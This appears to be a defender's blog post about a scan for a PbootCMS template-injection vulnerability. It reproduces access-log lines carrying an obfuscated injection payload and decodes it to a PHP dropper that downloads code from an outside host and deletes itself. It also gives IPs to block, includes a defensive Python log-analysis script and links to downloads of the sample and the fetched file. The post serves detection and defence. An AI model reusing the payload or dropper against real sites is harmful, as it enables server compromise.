
Found a sample scanning for a PbootCMS vulnerability

Date: 3 April 2024

Editor: anonymous

It is a Python crawler probing the site to see whether it has the vulnerability; the scanning IP is located in Hong Kong.
The sample is as follows:
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=1 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=2 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=3 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=4 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=5 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=6 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=7 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=8 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=9 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=10 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=11 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=12 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=13 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=15 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=16 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=17 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=18 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=19 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=20 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:15 +0800] "GET /aasaa.php HTTP/1.1" 403 146 "-" "python-requests/2.31.0"
The base64 string in the request decodes to:
<?php
// Fetch dd.txt from the remote host and write it to configs.php next to this file
file_put_contents('configs.php',file_get_contents('http://ma.hth01.cc/dd.txt'));
// Marker string printed so the caller can tell the script ran
echo 'hs11888';
// Delete this dropper so only configs.php is left behind
unlink(__FILE__);
Block the IPs of the two malicious scripts:
154.89.4.7
154.213.17.132
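The log lines above show the whole pattern in one burst: a template-injection attempt through the {pboot:if ... {/pboot:if} tag, with the function names split into string fragments and the dropper body hidden in base64, followed a few seconds later by a request for the file the dropper would have written. The script below is an added example written for this post, not the scanner's code and not part of PbootCMS. It parses combined-format access-log lines, normalises the \x22 escapes and the "a"."b" concatenation so the real function names show through, decodes any base64 blob it finds into the PHP it would run, and links the later GET for the dropped file back to the injection attempt. The sample lines are constructed from the entries in the post (the 203.0.113.10 line is a benign request added so the detector has something to ignore); the URL-decoding step is an assumption that goes beyond the post's sample, since that sample is not percent-encoded.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample data, modelled on the access-log lines in the post. The scanner IP,
# request path and base64 payload are copied from the post; the third line (203.0.113.10,
# a documentation address) is a benign request added so the detector has something to ignore.
PAYLOAD_B64 = "PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw=="
INJECT_PATH = (
    '/{pboot:if((\\x22file_put_co\\x22.\\x22ntents\\x22)(\\x22aasaa.php\\x22,'
    '(\\x22base6\\x22.\\x224_decode\\x22)(\\x22' + PAYLOAD_B64 + '\\x22)))}{/pboot:if}/../../?p=1'
)
SAMPLE_LOG = [
    '154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET ' + INJECT_PATH + ' HTTP/1.1" 403 146 "-" "Python-urllib/3.12"',
    '154.89.4.7 - - [03/Apr/2024:07:30:15 +0800] "GET /aasaa.php HTTP/1.1" 403 146 "-" "python-requests/2.31.0"',
    '203.0.113.10 - - [03/Apr/2024:07:31:00 +0800] "GET /index.php?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# PbootCMS template tag the scanner is trying to get evaluated.
TAG_RE = re.compile(r'\{pboot:if', re.IGNORECASE)
# Candidate base64 blobs and the "name.php" argument of the write call.
B64_RE = re.compile(r'[A-Za-z0-9+/]{24,}={0,2}')
PHP_NAME_RE = re.compile(r'"([\w.-]+\.php)"')
# Function calls, either plain name( or the obfuscated ("name")( string-call form;
# the lookbehind keeps the tag name in {pboot:if( from matching.
CALL_RE = re.compile(r'(?:"([A-Za-z_]\w*)"\)|(?<![:\w])([A-Za-z_]\w*))\s*\(')
URL_RE = re.compile(r'https?://[^\s\'"]+')


def parse_line(line):
    """Split one combined-format log line into its fields, or return None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_path(path):
    """Undo the encodings that hide the injected code from a naive grep."""
    text = unquote(path)                    # %7B -> { etc. (assumed; the post's sample is not encoded)
    text = text.replace('\\x22', '"')       # Apache logs a literal \x22 for a double quote
    return re.sub(r'"\s*\.\s*"', '', text)  # "file_put_co"."ntents" -> "file_put_contents"


def call_names(text):
    """Sorted, de-duplicated function names that appear to be called in text."""
    return sorted({a or b for a, b in CALL_RE.findall(text)})


def decode_payloads(text):
    """Return every base64 blob in text that decodes to readable UTF-8."""
    out = []
    for token in B64_RE.findall(text):
        try:
            out.append(base64.b64decode(token, validate=True).decode('utf-8'))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def analyze(lines):
    """Flag template-injection attempts and the follow-up probe for the dropped file."""
    findings = []
    dropped = set()  # paths the injected code would create, e.g. /aasaa.php
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        norm = normalize_path(rec['path'])
        if TAG_RE.search(norm):
            payloads = decode_payloads(norm)
            dropped.update('/' + name for name in PHP_NAME_RE.findall(norm))
            findings.append({
                'kind': 'pboot_template_injection',
                'ip': rec['ip'], 'ua': rec['ua'], 'status': rec['status'],
                'calls': call_names(norm),
                'payloads': payloads,
                'payload_calls': sorted({c for p in payloads for c in call_names(p)}),
                'payload_urls': sorted({u for p in payloads for u in URL_RE.findall(p)}),
            })
        elif norm in dropped:
            findings.append({
                'kind': 'dropped_file_probe',
                'ip': rec['ip'], 'ua': rec['ua'], 'status': rec['status'], 'path': norm,
            })
    return findings


def ips_to_block(findings):
    """Source addresses seen in any finding, ready for a firewall deny list."""
    return sorted({f['ip'] for f in findings})


if __name__ == '__main__':
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f)
    print('block:', ips_to_block(results))
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. The 403 on every request in the post's sample means the server rejected the request before PbootCMS saw it; the important signal for a defender is the follow-up GET for /aasaa.php, which is the scanner checking whether its dropper landed, and the payload_urls field, which names the host the dropper would fetch configs.php from and so belongs on the outbound block list as well.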
Malicious PbootCMS vulnerability scan sample (恶意扫描pbootcms漏洞样本.txt)
Link: https://pan.baidu.com/s/1fa__G9QakFfy5Didl_ax8w  Extraction code: krcu
dd.txt, the file the malicious code fetches
Link: https://pan.baidu.com/s/1cWwZJVMtmYFatuShxV3GPQ  Extraction code: xvfh